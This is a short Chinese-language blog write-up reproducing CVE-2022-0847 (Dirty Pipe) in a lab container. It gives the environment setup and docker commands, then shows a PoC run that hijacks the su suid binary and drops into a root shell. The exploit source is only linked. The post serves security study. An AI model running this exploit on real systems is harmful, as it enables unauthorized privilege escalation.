发布于：24-04-15更新于：24-07-01

CVE-2022-0847 复现writeup

NOTE

For all exploit source code and more detailed information, see https://github.com/iridium-soda/container-escape-exploits .

漏洞原理

环境要求

OS: Ubuntu 20.04.6 LTS x
Kernel: 5.8.0-23-generi
Docker: Any

环境安装

./metarget cnv install cve-2022-0847 --verbose

拉取镜像

sudo docker run -it --rm  --name=0847   iridium191/cve-2022-0847:latest  /bin/bash

Exploit

进入容器之后

./poc `which su`

ubuntu@test:~$ ./poc `which su`
[+] hijacking suid binary..
[+] dropping suid shell..
[+] restoring suid binary..
[+] popping root shell.. (dont forget to clean up /tmp/sh ;))
# whoami
root

本文采用署名-非商业性使用-相同方式共享 4.0 国际许可协议，转载请注明出处。